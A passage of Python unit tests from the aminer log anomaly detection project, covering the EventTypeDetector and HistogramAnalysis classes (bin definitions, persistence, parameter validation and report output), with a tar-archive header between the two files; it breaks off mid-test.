self.assertEqual(etd.num_event_lines, [1]) # test min_num_vals and max_num_vals etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) val_list = [[[]]] for i in range(1, etd.max_num_vals + 1, 1): log_atom = LogAtom(str(i).encode(), ParserMatch(MatchElement("path", str(i).encode(), i, None)), t, self.__class__.__name__) val_list[0][0].append(float(i)) self.assertTrue(etd.receive_atom(log_atom)) self.assertEqual(etd.values, val_list) i += 1 log_atom = LogAtom(str(i).encode(), ParserMatch(MatchElement("path", str(i).encode(), i, None)), t, self.__class__.__name__) val_list[0][0].append(float(i)) self.assertTrue(etd.receive_atom(log_atom)) self.assertEqual(etd.values, [[val_list[0][0][-etd.min_num_vals:]]]) #, ["/seq/s1", "/seq/d1"] def test2do_timer(self): """Test if the do_timer method is implemented properly.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) t = time.time() etd.next_persist_time = t + 400 self.assertEqual(etd.do_timer(t + 200), 200) self.assertEqual(etd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(etd.do_timer(t + 999), 1) self.assertEqual(etd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3persistence(self): """Test the do_persist and load_persistence_data methods.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) t = round(time.time(), 3) log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, etd) log_atom2 = LogAtom(self.match_element2.match_string, ParserMatch(self.match_element2), t, etd) log_atom3 = LogAtom(self.match_element3.match_string, ParserMatch(self.match_element3), t, etd) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/seq/s11"]) self.assertTrue(etd.receive_atom(log_atom1)) self.assertTrue(etd.receive_atom(log_atom2)) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if len(y) > 0 and isinstance(y[0], (int, float))]) + sorted([y for y in x if len(y) > 0 and isinstance(y[0], str)]) + [y for y in x if len(y) == 0] for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]], [["ddd ", "ddd "], [], []]]) self.assertEqual(etd.check_variables, [[True, True, True], [y != [] for y in etd.values[1]]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",), ("ddd ",)]) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [1, 2]) etd.do_persist() # with open(etd.persistence_file_name, "r") as f: # self.assertEqual(f.read(), '[[["string:/seq", "string:/seq/s11", "string:/seq/d1"], ["string:/seq", "string:/seq/s11", "string:/seq/d1"]], [["string:/seq", "string:/seq/s11", "string:/seq/d1"], ["string:/seq", "string:/seq/s11", "string:/seq/d1"]], [[["string: pid=25537"], ["string: pid="], [25537.0]], [[], ["string:ddd ", "string:ddd "], []]], [], [[true, true, true], [false, true, false]], [1, 2], [["string: pid="], ["string:ddd "]]]') etd.num_events = 0 etd.found_keys = [] etd.variable_key_list = [] etd.values = [] etd.num_event_lines = [] etd.current_index = 0 etd.id_path_list_tuples = [] etd.load_persistence_data() self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if len(y) > 0 and isinstance(y[0], (int, float))]) + sorted([y for y in x if len(y) > 0 and isinstance(y[0], str)]) + [y for y in x if len(y) == 0] for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]], [["ddd ", "ddd "], [], []]]) self.assertEqual(etd.check_variables, [[True, True, True], [y != [] for y in etd.values[1]]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",), ("ddd ",)]) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1, 2]) other = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertEqual(etd.num_events, other.num_events) self.assertEqual(etd.found_keys, other.found_keys) self.assertEqual(etd.variable_key_list, other.variable_key_list) self.assertEqual(etd.values, other.values) self.assertEqual(etd.check_variables, other.check_variables) self.assertEqual(etd.longest_path, other.longest_path) self.assertEqual(etd.id_path_list_tuples, other.id_path_list_tuples) self.assertEqual(etd.current_index, other.current_index) self.assertEqual(etd.num_event_lines, other.num_event_lines) def test4validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, ["default"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, None) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, "") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, b"Default") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, True) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, 123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, 123.3) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, {"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, ()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, set()) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=set()) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=[""]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=[b"True"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list="True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=True) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123.22) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=set()) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["default"]) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=None) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=[]) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=[""]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=[b"True"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list="True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=True) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=123.22) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=set()) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["default"]) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=None) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=[]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=b"True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id="True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=123.22) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=["Default"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=[]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=set()) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=True) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=b"True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples="True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=123.22) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=["Default"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=[()]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=set()) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=[]) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=None) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=[(b"value",)]) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=-1) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=b"Default") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals="123") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=["Default"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=[]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=set()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=100.22) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=-1) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=0) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=b"Default") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals="123") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=["Default"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=[]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=set()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=100.22) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=100, max_num_vals=100) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=101, max_num_vals=100) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], min_num_vals=10, max_num_vals=100) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values=b"True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values="True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values=123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values=123.22) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values=["Default"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values=[]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values=set()) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], save_values=True) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=set()) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/HistogramAnalysisTest.py000066400000000000000000001344371500476301700304720ustar00rootroot00000000000000import unittest from aminer.analysis.HistogramAnalysis import LinearNumericBinDefinition, ModuloTimeBinDefinition, HistogramData, HistogramAnalysis, \ PathDependentHistogramAnalysis from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch import time from datetime import datetime from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase class HistogramAnalysisTest(TestBase): """Unittests for the HistogramAnalysis.""" def test1LinearNumericBinDefinition(self): """This test case aims to validate the functionality of the LinearNumericBinDefinition.""" # test get_bin_names method self.assertEqual(LinearNumericBinDefinition(0, 1, 10, True).get_bin_names(), [ "...-0]", "[0-1]", "[1-2]", "[2-3]", "[3-4]", "[4-5]", "[5-6]", "[6-7]", "[7-8]", "[8-9]", "[9-10]", "[10-..."]) self.assertEqual(LinearNumericBinDefinition(0, 2, 10, True).get_bin_names(), [ "...-0]", "[0-2]", "[2-4]", "[4-6]", "[6-8]", "[8-10]", "[10-12]", "[12-14]", "[14-16]", "[16-18]", "[18-20]", "[20-..."]) # test get_bin method self.assertEqual(LinearNumericBinDefinition(0, 1, 10, True).get_bin(2), 3) self.assertEqual(LinearNumericBinDefinition(1, 1, 10, True).get_bin(2), 2) self.assertEqual(LinearNumericBinDefinition(2, 1, 10, True).get_bin(2), 1) self.assertEqual(LinearNumericBinDefinition(0, 4, 10, True).get_bin(2), 1) # test get_bin_p_values method lnbd = LinearNumericBinDefinition(0, 1, 10, True) self.assertNotEqual(lnbd.get_bin_p_value(2, 10, 2), None, "Probably the scipy module could not be loaded. Please check your installation.") def test2ModuloTimeBinDefinition(self): """This test case aims to validate the functionality of the ModuloTimeBinDefinition.""" mtbd = ModuloTimeBinDefinition(86400, 3600, 0, 1, 10, False) self.assertEqual(mtbd.get_bin_names(), ["[0-1]", "[1-2]", "[2-3]", "[3-4]", "[4-5]", "[5-6]", "[6-7]", "[7-8]", "[8-9]", "[9-10]"]) mtbd = ModuloTimeBinDefinition(86400, 3600, 0, 2, 10, False) self.assertEqual(mtbd.get_bin_names(), ["[0-2]", "[2-4]", "[4-6]", "[6-8]", "[8-10]", "[10-12]", "[12-14]", "[14-16]", "[16-18]", "[18-20]"]) # test get_bin method modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) self.assertEqual(modulo_time_bin_definition.get_bin(57599), 15) self.assertEqual(modulo_time_bin_definition.get_bin(57600), 16) self.assertEqual(modulo_time_bin_definition.get_bin(61199), 16) self.assertEqual(modulo_time_bin_definition.get_bin(61200), 17) # test get_bin_p_values method mtbd = ModuloTimeBinDefinition(86400, 3600, 0, 1, 10, False) self.assertNotEqual(mtbd.get_bin_p_value(2, 10, 2), None, "Probably the scipy module could not be loaded. Please check your installation.") def test3HistogramData(self): """This test case aims to validate the functionality of the HistogramData.""" # test add_value method modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) histogram_data = HistogramData("crontab", modulo_time_bin_definition) histogram_data.add_value(57600) self.assertEqual(histogram_data.bin_data[16], 1) self.assertEqual(histogram_data.total_elements, 1) self.assertEqual(histogram_data.binned_elements, 0) histogram_data.add_value(61200) self.assertEqual(histogram_data.bin_data[16], 1) self.assertEqual(histogram_data.bin_data[17], 1) self.assertEqual(histogram_data.total_elements, 2) self.assertEqual(histogram_data.binned_elements, 0) histogram_data.add_value(61500) self.assertEqual(histogram_data.bin_data[16], 1) self.assertEqual(histogram_data.bin_data[17], 2) self.assertEqual(histogram_data.total_elements, 3) self.assertEqual(histogram_data.binned_elements, 0) histogram_data.add_value(100000) # 100000%86400 = 13600 -> 3 self.assertEqual(histogram_data.bin_data[3], 1) self.assertEqual(histogram_data.bin_data[16], 1) self.assertEqual(histogram_data.bin_data[17], 2) self.assertEqual(histogram_data.total_elements, 4) self.assertEqual(histogram_data.binned_elements, 0) # test clone method clone = histogram_data.clone() self.assertEqual(clone.bin_data[3], 1) self.assertEqual(clone.bin_data[16], 1) self.assertEqual(clone.bin_data[17], 2) self.assertEqual(clone.total_elements, 4) self.assertEqual(clone.binned_elements, 0) clone.add_value(1) self.assertEqual(clone.bin_data[0], 1) self.assertEqual(histogram_data.bin_data[0], 0) # test reset method histogram_data.reset() self.assertEqual(histogram_data.total_elements, 0) self.assertEqual(histogram_data.binned_elements, 0) for item in histogram_data.bin_data: self.assertEqual(item, 0) self.assertEqual(clone.bin_data[0], 1) self.assertEqual(clone.bin_data[3], 1) self.assertEqual(clone.bin_data[16], 1) self.assertEqual(clone.bin_data[17], 2) self.assertEqual(clone.total_elements, 5) self.assertEqual(clone.binned_elements, 0) # test to_string method self.assertEqual(clone.to_string(""), 'Property "crontab" (5 elements):\n* [0-1]: 1 (ratio = 2.00e-01, p = 1.92e-01)\n' '* [3-4]: 1 (ratio = 2.00e-01, p = 1.92e-01)\n* [16-17]: 1 (ratio = 2.00e-01, p = 1.92e-01)\n* [17-18]: 2 (ratio = 4.00e-01, p = 1.60e-02)') def test4receive_atom_HistogramAnalysis(self): """Test if reports on anomalies are generated correctly.""" expected_string = '%s Histogram report\n%s: "None" (%d lines)\n Histogram report from %s till %s\n %s\n\n' datetime_format_string = "%Y-%m-%d %H:%M:%S" t = time.time() # test the functionality of the HistogramAnalysis, when NO report is expected start_time = 57600 end_time = 662600 diff = 30000 mtbd = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) histogram_data = HistogramData("match", mtbd) histogram_analysis = HistogramAnalysis(self.aminer_config, [(histogram_data.property_path, mtbd)], 604800, [self.stream_printer_event_handler]) match_element_start = MatchElement("match", str(start_time).encode(), start_time, None) log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t, histogram_analysis) match_element_end = MatchElement("match", str(end_time).encode(), end_time, None) log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t + diff, histogram_analysis) histogram_analysis.receive_atom(log_atom_start) histogram_analysis.receive_atom(log_atom_end) self.assertEqual(self.output_stream.getvalue(), "") log_atom_start.atom_time += diff log_atom_end.atom_time += diff histogram_analysis.receive_atom(log_atom_start) histogram_analysis.receive_atom(log_atom_end) self.assertEqual(self.output_stream.getvalue(), "") # test the functionality of the HistogramAnalysis, when a report is expected. start_time = 57600 end_time = 662600 diff = 605000 histogram_data.reset() histogram_analysis = HistogramAnalysis(self.aminer_config, [(histogram_data.property_path, mtbd)], 604800, [self.stream_printer_event_handler]) match_element_start = MatchElement("match", str(start_time).encode(), start_time, None) log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t, histogram_analysis) match_element_end = MatchElement("match", str(end_time).encode(), end_time, None) log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t + diff, histogram_analysis) histogram_analysis.receive_atom(log_atom_start) histogram_analysis.receive_atom(log_atom_end) dtm = datetime.fromtimestamp(t).strftime(datetime_format_string) dtm2 = datetime.fromtimestamp(t + diff).strftime(datetime_format_string) self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, histogram_analysis.__class__.__name__, 2, dtm, dtm2, 'Property "match" (2 elements):\n * [16-17]: 2 (ratio = 1.00e+00, p = 1.74e-03)')) self.reset_output_stream() t1 = t + diff start_time += 3600 end_time += 3600 log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t1, histogram_analysis) match_element_end = MatchElement("match", str(end_time).encode(), end_time, None) log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t1 + diff, histogram_analysis) histogram_analysis.receive_atom(log_atom_start) histogram_analysis.receive_atom(log_atom_end) dtm = datetime.fromtimestamp(t1).strftime(datetime_format_string) dtm2 = datetime.fromtimestamp(t1 + diff).strftime(datetime_format_string) self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, histogram_analysis.__class__.__name__, 2, dtm, dtm2, 'Property "match" (2 elements):\n * [16-17]: 1 (ratio = 5.00e-01, p = 8.16e-02)\n * [17-18]: 1 (ratio = 5.00e-01, p = 8.16e-02)')) # reset_after_report_flag = False start_time = 57600 end_time = 662600 diff = 605000 histogram_data.reset() histogram_analysis = HistogramAnalysis(self.aminer_config, [(histogram_data.property_path, mtbd)], 604800, [self.stream_printer_event_handler], reset_after_report_flag=False) match_element_start = MatchElement("match", str(start_time).encode(), start_time, None) log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t1, histogram_analysis) match_element_end = MatchElement("match", str(end_time).encode(), end_time, None) log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t1 + diff, histogram_analysis) histogram_analysis.receive_atom(log_atom_start) histogram_analysis.receive_atom(log_atom_end) dtm = datetime.fromtimestamp(t1).strftime(datetime_format_string) dtm2 = datetime.fromtimestamp(t1 + diff).strftime(datetime_format_string) self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, histogram_analysis.__class__.__name__, 2, dtm, dtm2, 'Property "match" (2 elements):\n * [16-17]: 1 (ratio = 5.00e-01, p = 8.16e-02)\n * [17-18]: 1 (ratio = 5.00e-01, p = 8.16e-02)') + expected_string % (dtm2, histogram_analysis.__class__.__name__, 2, dtm, dtm2, 'Property "match" (2 elements):\n * [16-17]: 2 (ratio = 1.00e+00, p = 1.74e-03)')) self.reset_output_stream() t2 = t1 + diff start_time += 3600 end_time += 3600 log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t2, histogram_analysis) match_element_end = MatchElement("match", str(end_time).encode(), end_time, None) log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t2 + diff, histogram_analysis) histogram_analysis.receive_atom(log_atom_start) histogram_analysis.receive_atom(log_atom_end) dtm = datetime.fromtimestamp(t2).strftime(datetime_format_string) dtm2 = datetime.fromtimestamp(t2 + diff).strftime(datetime_format_string) self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, histogram_analysis.__class__.__name__, 4, dtm, dtm2, 'Property "match" (4 elements):\n * [16-17]: 3 (ratio = 7.50e-01, p = 2.80e-04)\n * [17-18]: 1 (ratio = 2.50e-01, p = 1.57e-01)')) def test5receive_atom_PathDependentHistogramAnalysis(self): """Test if reports on anomalies are generated correctly.""" expected_string = '%s Histogram report\n%s: "None" (%d lines)\n Path histogram report from %s till %s\n%s\n\n' datetime_format_string = "%Y-%m-%d %H:%M:%S" t = time.time() # test the functionality of the HistogramAnalysis, when NO report is expected start_time = 57600 end_time = 662600 diff = 30000 mtbd = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) histogram_data = HistogramData("match", mtbd) pdha = PathDependentHistogramAnalysis(self.aminer_config, histogram_data.property_path, mtbd, 604800, [self.stream_printer_event_handler], True) match_element_start = MatchElement("match", str(start_time).encode(), start_time, None) log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t, pdha) match_element_end = MatchElement("match", str(end_time).encode(), end_time, None) log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t + diff, pdha) pdha.receive_atom(log_atom_start) pdha.receive_atom(log_atom_end) self.assertEqual(self.output_stream.getvalue(), "") log_atom_start.atom_time += diff log_atom_end.atom_time += diff pdha.receive_atom(log_atom_start) pdha.receive_atom(log_atom_end) self.assertEqual(self.output_stream.getvalue(), "") # test the functionality of the HistogramAnalysis, when a report is expected. start_time = 57600 end_time = 662600 diff = 605000 histogram_data.reset() pdha = PathDependentHistogramAnalysis(self.aminer_config, histogram_data.property_path, mtbd, 604800, [self.stream_printer_event_handler], True) match_element_start = MatchElement("match", str(start_time).encode(), start_time, None) log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t, pdha) match_element_end = MatchElement("match", str(end_time).encode(), end_time, None) log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t + diff, pdha) pdha.receive_atom(log_atom_start) pdha.receive_atom(log_atom_end) dtm = datetime.fromtimestamp(t).strftime(datetime_format_string) dtm2 = datetime.fromtimestamp(t + diff).strftime(datetime_format_string) self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, pdha.__class__.__name__, 2, dtm, dtm2, 'Path values "match":\nExample: 662600\n Property "match" (2 elements):\n * [16-17]: 2 (ratio = 1.00e+00, p = 1.74e-03)')) self.reset_output_stream() t1 = t + diff start_time += 3600 end_time += 3600 log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t1, pdha) match_element_end = MatchElement("match", str(end_time).encode(), end_time, None) log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t1 + diff, pdha) pdha.receive_atom(log_atom_start) pdha.receive_atom(log_atom_end) dtm = datetime.fromtimestamp(t1).strftime(datetime_format_string) dtm2 = datetime.fromtimestamp(t1 + diff).strftime(datetime_format_string) self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, pdha.__class__.__name__, 2, dtm, dtm2, 'Path values "match":\nExample: 666200\n Property "match" (2 elements):\n * [16-17]: 1 (ratio = 5.00e-01, p = 8.16e-02)\n * [17-18]: 1 (ratio = 5.00e-01, p = 8.16e-02)')) # reset_after_report_flag = False start_time = 57600 end_time = 662600 diff = 605000 histogram_data.reset() pdha = PathDependentHistogramAnalysis(self.aminer_config, histogram_data.property_path, mtbd, 604800, [self.stream_printer_event_handler], reset_after_report_flag=False) match_element_start = MatchElement("match", str(start_time).encode(), start_time, None) log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t1, pdha) match_element_end = MatchElement("match", str(end_time).encode(), end_time, None) log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t1 